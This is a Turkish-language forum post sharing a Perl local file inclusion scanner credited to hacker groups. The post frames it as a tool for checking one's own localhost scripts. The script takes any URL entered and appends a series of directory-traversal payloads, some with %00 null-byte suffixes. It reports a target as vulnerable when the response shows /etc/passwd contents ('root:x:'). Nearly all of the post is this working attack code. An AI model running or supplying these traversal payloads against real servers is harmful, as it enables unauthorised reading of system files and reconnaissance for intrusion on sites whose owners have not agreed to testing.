Selam,
Localhosttaki scriptlerinizde LFI arar.
Yararlı olur umarım.
Kod:
#!/usr/bin/perl
##########################################################################
#programmer:kiddies or peneter@darkc0de (crasher_1412@yahoo.com) #
#special thanks: mywisdom,gunslinger(rock n rool man),flyff_666 #
#(root admin in devilzc0de,petimati,spykit(admin in irc.dal.net #
#and irc.byroe.net devilzc0de),gonzhack martin(my brother), #
#7460(thanks for bcktrack 4)and
[Linkleri görebilmek için üye olun veya giriş yapın.](thanks was #
#believe in me to be contributor #
#forum thanks:jasakom,echo.or.id,darkc0de,bec0de,codecall #
##########################################################################
# Dvi In win Local Host Is az7rb , My From Is P0c Team #
##########################################################################
use LWP::UserAgent;
use HTTP::Request;
system('clear','cls');
print "=======================================================\n";
print "= =\n";
print "= LFI_Scanner v 1.0 Win/Local-Host =\n";
print "= ~[ Az7rb - P0c TeaM ]~ =\n";
print "= =\n";
print "= E.g: input : localhost/script/index.php?id= =\n";
print "= =\n";
print "===================bec0de contributor==================\n\n";
print '>';chomp($link = <STDIN>);
if($link !~ /http:///) { $link = "http://$link"; }
print "\n>press [enter] to check the vulnerability in lfi[...]\n";
$start =<STDIN>;
@vuls = (
'readfile.txt',
'../readfile.txt',
'../../readfile.txt',
'../../../readfile.txt',
'../../../../readfile.txt',
'../../../../../readfile.txt',
'../../../../../../readfile.txt',
'../../../../../../../readfile.txt',
'../../../../../../../../readfile.txt',
'../../../../../../../../../readfile.txt',
'readfile.txt%00',
'../readfile.txt%00',
'../../readfile.txt%00',
'../../../readfile.txt%00',
'../../../../readfile.txt%00',
'../../../../../readfile.txt%00',
'../../../../../../readfile.txt%00',
'../../../../../../../readfile.txt%00',
'../../../../../../../../readfile.txt%00',
'../../../../../../../../../readfile.txt%00');
print ">start scaning[...]\n";
foreach $scan(@vuls){
$url = $link.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable_Read_File;}
else { $msg = "no";}
print "$scan..........[$msg]\n";
}